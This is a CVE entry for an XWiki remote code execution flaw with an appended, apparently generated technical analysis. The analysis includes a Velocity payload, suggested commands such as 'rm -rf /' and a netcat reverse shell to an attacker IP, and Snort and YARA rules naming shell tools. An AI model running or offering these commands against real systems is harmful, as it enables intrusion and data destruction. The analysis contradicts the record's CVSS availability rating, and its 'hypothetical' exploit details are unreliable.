CVE-2023-35150
CVE-2023-35150
9.9
CriticalPublished:
Last updated:
Source:security-advisories@github.com
Modified
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- Low
- User Interaction
- None
- Scope
- Changed
- Confidentiality
- High
- Integrity
- High
- Availability
- Low
Description
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Starting in version 2.40m-2 and prior to versions 14.4.8, 14.10.4, and 15.0, any user with view rights on any document can execute code with programming rights, leading to remote code execution by crafting an url with a dangerous payload. The problem has been patched in XWiki 15.0, 14.10.4 and 14.4.8.
Comprehensive Technical Analysis of CVE-2023-35150 (XWiki Platform Remote Code Execution Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
CVE ID: CVE-2023-35150 CVSS Score: 9.9 (Critical) – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H Vulnerability Type: Remote Code Execution (RCE) via Improper Access Control Exploitability: High (Low attack complexity, low privileges required, no user interaction)
Severity Breakdown:
- Attack Vector (AV:N): Exploitable remotely over a network.
- Attack Complexity (AC:L): Low complexity; no specialized conditions required.
- Privileges Required (PR:L): Low privileges (any authenticated user with view rights on a document).
- User Interaction (UI:N): None required.
- Scope (S:C): Changes scope (impacts other components beyond the vulnerable one).
- Confidentiality (C:H), Integrity (I:H), Availability (A:H): High impact on all three security objectives.
This vulnerability is critical due to its low barrier to exploitation and high impact, allowing attackers to execute arbitrary code with programming rights (equivalent to administrative privileges in XWiki).
2. Potential Attack Vectors and Exploitation Methods
Root Cause:
The vulnerability stems from insufficient access control checks in XWiki’s programming rights evaluation mechanism. Specifically:
- XWiki allows users with view rights on a document to execute Velocity scripts (a templating engine) embedded in wiki pages.
- Due to a flaw in the rights validation logic, an attacker can bypass programming rights restrictions by crafting a malicious URL containing a dangerous payload (e.g., a Velocity script with arbitrary code execution).
Exploitation Steps:
- Authentication: Attacker logs in as a low-privileged user (only requires view rights on any document).
- Payload Crafting: The attacker constructs a malicious URL containing a Velocity script that executes arbitrary commands (e.g., OS command injection, file read/write, or reverse shell).
- Example payload (simplified):
{{velocity}} $services.execution.execute("id") // Executes system command {{/velocity}}
- Example payload (simplified):
- Triggering the Exploit: The attacker sends the crafted URL to the XWiki instance, which processes the script with programming rights, leading to RCE.
Exploitation Scenarios:
- Unauthenticated Attack (if guest access is enabled): If XWiki allows anonymous viewing, an unauthenticated attacker could exploit this.
- Insider Threat: A low-privileged user (e.g., a wiki contributor) could escalate privileges to admin-level access.
- Chained Exploits: Could be combined with XSS or CSRF to automate attacks.
Proof-of-Concept (PoC) Considerations:
- A public PoC may emerge, increasing exploitation risk.
- Attackers could use automated scanners to identify vulnerable XWiki instances.
3. Affected Systems and Software Versions
Vulnerable Versions:
- XWiki Platform 2.40m-2 and later, prior to:
- 14.4.8
- 14.10.4
- 15.0
Affected Components:
- XWiki Core Engine (programming rights evaluation mechanism).
- Velocity Scripting Engine (used for dynamic content rendering).
Deployment Scenarios at Risk:
- Public-facing XWiki instances (highest risk).
- Internal wikis (if accessible by untrusted users).
- Multi-tenant XWiki deployments (shared environments).
4. Recommended Mitigation Strategies
Immediate Actions:
-
Apply Patches Immediately:
- Upgrade to XWiki 15.0, 14.10.4, or 14.4.8 (or later).
- Patch commit:
b65220a4d86b8888791c3b643074ebca5c089a3a.
-
Workarounds (if patching is not immediately possible):
- Disable Velocity Scripting (if not critical for operations).
- Restrict View Rights: Limit document viewing to trusted users only.
- Enable Strict Programming Rights: Ensure only administrators can execute scripts.
- Network-Level Protections:
- WAF Rules: Block requests containing suspicious Velocity script patterns.
- IP Whitelisting: Restrict access to trusted IPs.
-
Monitoring and Detection:
- Log Analysis: Monitor for unusual Velocity script executions in logs.
- Intrusion Detection: Deploy IDS/IPS to detect exploitation attempts.
- File Integrity Monitoring (FIM): Detect unauthorized changes to critical files.
Long-Term Recommendations:
- Regular Security Audits: Conduct penetration testing and code reviews for XWiki deployments.
- Least Privilege Principle: Restrict view and edit rights to the minimum necessary.
- Automated Patch Management: Implement automated updates for XWiki and dependencies.
- Incident Response Plan: Prepare for RCE exploitation scenarios (e.g., containment, forensic analysis).
5. Impact on the Cybersecurity Landscape
Broader Implications:
- Increased Attack Surface: XWiki is widely used in enterprise, government, and educational sectors, making this a high-value target.
- Supply Chain Risks: If XWiki is integrated into custom applications, downstream systems may also be at risk.
- Exploit Availability: Given the low complexity of exploitation, script kiddies and APT groups may leverage this vulnerability.
- Compliance Risks: Organizations failing to patch may violate GDPR, HIPAA, or other regulatory frameworks due to unauthorized data access.
Historical Context:
- Similar RCE vulnerabilities in wiki platforms (e.g., Confluence, MediaWiki) have led to large-scale breaches.
- CISA’s Known Exploited Vulnerabilities (KEV) Catalog may include this CVE if active exploitation is observed.
6. Technical Details for Security Professionals
Vulnerability Mechanics:
- Programming Rights Bypass: XWiki’s rights evaluation fails to properly check if a user has programming rights when executing Velocity scripts via URL parameters.
- Velocity Script Injection: The flaw allows arbitrary Velocity code execution with elevated privileges, enabling:
- OS Command Execution (
$services.execution.execute()). - File System Access (
$services.filesystem). - Database Manipulation (
$services.query). - Reverse Shells (via
curl,wget, or PowerShell).
- OS Command Execution (
Exploit Code Analysis (Hypothetical):
{{velocity}}
#set($cmd = "id")
#set($output = $services.execution.execute($cmd))
$output
{{/velocity}}
- This script executes the
idcommand on the underlying OS. - Attackers could replace
idwith malicious payloads (e.g.,rm -rf /,nc -e /bin/sh <attacker_IP> 4444).
Forensic Indicators of Compromise (IOCs):
- Logs:
- Unusual Velocity script executions in
xwiki.log. - Failed programming rights checks in security logs.
- Unusual Velocity script executions in
- Network:
- Outbound connections to C2 servers (if reverse shell is established).
- Unauthorized file uploads/downloads.
- System:
- Unexpected processes (e.g.,
nc,bash,powershell). - Modified XWiki configuration files.
- Unexpected processes (e.g.,
Detection Rules (SIEM/Snort/YARA):
- Snort Rule (Example):
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"XWiki CVE-2023-35150 RCE Attempt"; flow:to_server,established; content:"/bin/sh"; nocase; content:"services.execution.execute"; nocase; reference:cve,CVE-2023-35150; classtype:attempted-admin; sid:1000001; rev:1;) - YARA Rule (for Malicious Velocity Scripts):
rule XWiki_RCE_Exploit { strings: $velocity_script = /\{\{velocity\}\}.*\$services\.execution\.execute\(.*\)/ $cmd_injection = /(rm|nc|wget|curl|bash|powershell)/ nocase condition: $velocity_script and $cmd_injection }
Post-Exploitation Considerations:
- Persistence: Attackers may:
- Create backdoor users with admin rights.
- Install web shells (e.g.,
.jsp,.phpfiles). - Modify XWiki extensions for long-term access.
- Lateral Movement: If XWiki is integrated with LDAP, databases, or APIs, attackers could pivot to other systems.
Conclusion
CVE-2023-35150 is a critical RCE vulnerability in XWiki Platform that bypasses programming rights checks, allowing low-privileged users to execute arbitrary code. Due to its high severity (CVSS 9.9), low exploitation complexity, and widespread deployment, organizations must patch immediately and implement defensive measures to prevent exploitation.
Key Takeaways for Security Teams: ✅ Patch now (XWiki 15.0, 14.10.4, or 14.4.8). ✅ Restrict view rights to trusted users. ✅ Monitor for exploitation attempts (logs, network traffic). ✅ Prepare for incident response in case of compromise.
Failure to mitigate this vulnerability could lead to full system compromise, data breaches, and regulatory penalties. Proactive defense is critical.
References
security-advisories@github.com
https://github.com/xwiki/xwiki-platform/commit/b65220a4d86b8888791c3b643074ebca5c089a3asecurity-advisories@github.com
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-6mf5-36v9-3h2wsecurity-advisories@github.com
https://jira.xwiki.org/browse/XWIKI-20285af854a3a-2127-422b-91ae-364da2661108
https://github.com/xwiki/xwiki-platform/commit/b65220a4d86b8888791c3b643074ebca5c089a3aaf854a3a-2127-422b-91ae-364da2661108
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-6mf5-36v9-3h2waf854a3a-2127-422b-91ae-364da2661108
https://jira.xwiki.org/browse/XWIKI-20285